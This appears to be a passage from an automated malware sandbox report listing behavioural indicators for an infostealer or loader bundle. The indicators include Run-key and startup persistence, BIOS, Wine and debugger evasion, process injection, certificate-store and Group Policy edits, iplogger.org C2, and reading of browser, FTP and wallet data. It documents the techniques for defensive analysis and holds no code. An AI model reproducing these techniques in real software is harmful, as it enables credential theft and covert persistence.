| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk | C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Software\Wine | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" | C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\60fd73a9-b566-4ebe-bf13-7efa1ba8c839\\f0_8GJMbJWHKd0bn8qAoSGuv.exe\" --AutoStart" | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5984 set thread context of 748 | N/A | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe |
| PID 2932 set thread context of 5168 | N/A | C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5020 set thread context of 5204 | N/A | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe |
| PID 6052 set thread context of 2780 | N/A | C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
